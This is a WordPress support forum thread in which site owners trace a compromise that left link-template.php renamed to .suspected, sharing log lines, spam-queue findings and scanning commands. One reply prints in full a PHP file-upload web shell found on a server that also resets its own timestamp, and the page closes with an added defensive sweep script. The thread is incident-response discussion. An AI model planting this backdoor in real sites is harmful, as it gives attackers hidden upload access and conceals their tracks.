• Hi,

    My site died two times and it showed two lines of code related to “link-template.php”. So I went to the cPanel -> wp-includes and saw that the file “link-template.php” had been renamed to “link-template.php.suspected”. I just want to know how this renaming happened. Is it because of a specific plugin?
    But yes, the site became live after renaming “link-template.php.suspected” to “link-template.php”.

    Thanks

Viewing 11 replies - 16 through 26 (of 26 total)
  • omega1

    (@gavinwatson)

    This line worried me in my logs :

    mysite.com 184.168.152.164 – – [11/Jun/2015:14:51:23 +0100] “POST /wp-includes/js/tinymce/plugins/page.php HTTP/1.0” 403 925 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344”

    Before it was giving a 200 code (now 403 in the above line)

    I looked at the code and it was malicious so I deleted it, they are still trying to get to it, hence the 403 now.

    Lets see if this helps…

    I found additional malicious code by checking the contents of the “frozen” status emails under Mail Queue manager in WHM.

    One of the lines is “X-PHP-Script: YOURSITE.com/folder/folder/folder/list.php”. List.php was one of the viruses the previous commands failed to pick up. This code got into my NON-WordPress site.

    I also noticed the hackers are using “[email protected]” to send spam mails. Currently trying to search @yoursite.com in my databases, will update if I find anything.

    omega1

    (@gavinwatson)

    And this one was causing issues:

    website.com/wp-content/plugins/cached_data/mail.php

    No idea where it came from!

    omega1

    (@gavinwatson)

    I see Rev Slider is being mentioned a lot regarding viruses, which I had on this site. I have the same WordPress version and other plugins on a large number of sites, all fine, except this one which had Rev Slider installed.

    I have deleted it for now…

    Joe

    (@joewa1980)

    Thanks for the Mail Queue tip… I just found 20,000 ‘Frozen’ mails in the outgoing queue on WHM. I’ve reset permissions for our mail server and also reset it, which has stopped them queuing up (at a rate of 50 per minute). None have been added in the past 30 mins so I’ll keep monitoring!

    Another suggestion. If CPhulk is not currently enabled, do enable it now and set it to notify you when there are 3 or more failed attempts. (You can set it to 1 or 2 if you wish).

    I looked through records over the past 3 days and spotted hackers trying to login at some point. However the CPhulk email notification was in the frozen mails due to the tens of thousands of spam in queue.

    If you do have these notifications set up, very likely the notifications were triggered but stuck.

    So, changing the file permissions on link-template.php definitely seems to have kept my site up now. It doesn’t remove the infected code, but it does mean that my site visitors aren’t faced with a glaring problem.

    Does anyone know how to see what code is filling the mail queues? I have the sendmail service stopped. I can purge the queue, but shortly after turning the service back on, I’ve got 1000s in there again. They are all created by my apache user. File auditing will only tell me that they were put there by the apache user on _____ date/time. I’d like to come up with a way to determine what code is putting them there. Any advice would be warmly welcomed.

    Same problem here. I’ve updated plugins and the theme but the problem with link-template.php is consistent. Every day there is another PHP file in random folders that sends spam. So, obviously something is wrong with the base. Does anyone know what type of code I should look for there?

    This may help others.

    maldet scans if you have shell access.

    Wordfence, add plugin and theme and other files in options.

    Anti-malware another plugin

    Even after running all those this shell command found some more

    egrep -Rl '\$GLOBALS.*\\x' /home/username/public_html

    And created a cron job to check and rename the file every five minutes as per the reference in https://www.ads-software.com/support/topic/link-templatephpsuspected/page/2?replies=60 by 518tech

    Hey everyone,

    Sounds like people are experiencing something similar to what we are on one of our sites. We found one extra file that might help others narrow down the source.

    We found it by looking over our access logs for IPs that accessed the known suspicious files and looking at other files they accessed. We found a couple references to “license.php” at the public_html level. This file in particular had a Last Modified date of “Dec 31st, 1968”. Fun fact: that means the time stamp on the file is literally 0.

    Obviously we didn’t edit a file in 1969 and opening it up, we found the following

    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
    <title>utf</title>
    </head>
    <body>
    <?php
    print "<h1>#p@$c@#</h1>\n";
    echo "Your IP: ";
    echo $_SERVER['REMOTE_ADDR'];
    echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
    echo "<input type=\"file\" name=\"filename\"><br> \n";
    echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
    echo "</form>\n";
    if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
    	{
    	move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
    	$file = $_FILES/*;*/["filename"]["name"];
    	echo "<a href=\"$file\">$file</a>";
    	} else {
    	echo("empty");
    	}
    $filename = $_SERVER[SCRIPT_FILENAME];
    touch/*;*/($filename, $time);
    ?>
    </body>
    </html>

    This more or less confirms our suspicions that the hack is able to mask the modified date of the files it creates to help hide it among older files.

    We’re waiting to see if removing the content of the file prevents future outbreaks, but I wanted to post here to help others in their search and see if anyone’s uncovered a workable solution other than the cron job band-aid (which is a good idea, but not a permanent solution)
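A defender-side sweep that ties together the checks this thread describes: the $GLOBALS egrep from the earlier post, the back-dated modification time seen on license.php, and the *.suspected renames from the original report. This is an added example, not code from any of the posters; the sample web root, file names and file contents below are constructed for demonstration.

```shell
#!/bin/sh
# Added example (not from the thread): a defender-side sweep for three indicators
# the posts describe. The sample tree, paths and contents here are constructed.
#   1. PHP files carrying the '$GLOBALS ... \x' obfuscation (the thread's egrep)
#   2. files whose mtime was pushed back to 1970 (the touch() trick in license.php)
#   3. core files a scanner has quarantined by renaming to *.suspected

# Print PHP files matching the obfuscation pattern; the regex is the thread's own.
find_obfuscated() {
    find "$1" -type f -name '*.php' -exec grep -lE '\$GLOBALS.*\\x' {} + 2>/dev/null || true
}

# Print files whose mtime is not newer than 1971-01-01, i.e. near epoch 0.
# A reference file keeps this on POSIX find rather than GNU-only -newermt.
find_epoch_zero() {
    ref=$(mktemp)
    touch -t 197101010000 "$ref"
    find "$1" -type f ! -newer "$ref"
    rm -f "$ref"
}

# Print files a scanner renamed out of the way, e.g. link-template.php.suspected.
find_suspected() {
    find "$1" -type f -name '*.suspected'
}

# Constructed sample web root standing in for /home/username/public_html.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-includes" "$d/folder"
    printf '%s\n' '<?php function get_permalink() { return "ok"; }' > "$d/wp-includes/link-template.php"
    printf '%s\n' '<?php $GLOBALS["k"] = "\x61\x62\x63"; // constructed obfuscation sample' > "$d/folder/list.php"
    printf '%s\n' '<html><body>placeholder</body></html>' > "$d/license.php"
    touch -t 197001020000 "$d/license.php"        # back-dated like the real license.php
    : > "$d/wp-includes/link-template.php.suspected"
    echo "$d"
}

# Run all three checks over one directory and print a labelled report.
sweep() {
    echo "== obfuscated PHP under $1";   find_obfuscated "$1"
    echo "== back-dated files under $1"; find_epoch_zero "$1"
    echo "== quarantined files under $1"; find_suspected "$1"
}

# Usage: sh sweep.sh /home/username/public_html ; with no argument the sample tree is used.
if [ -n "${1:-}" ]; then sweep "$1"; else sweep "$(make_sample_tree)"; fi
```

Anything the first two checks report is a file to review by hand, not to delete blindly; the third check tells you which core file to restore from a clean WordPress download.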

  • The topic ‘link-template.php.suspected’ is closed to new replies.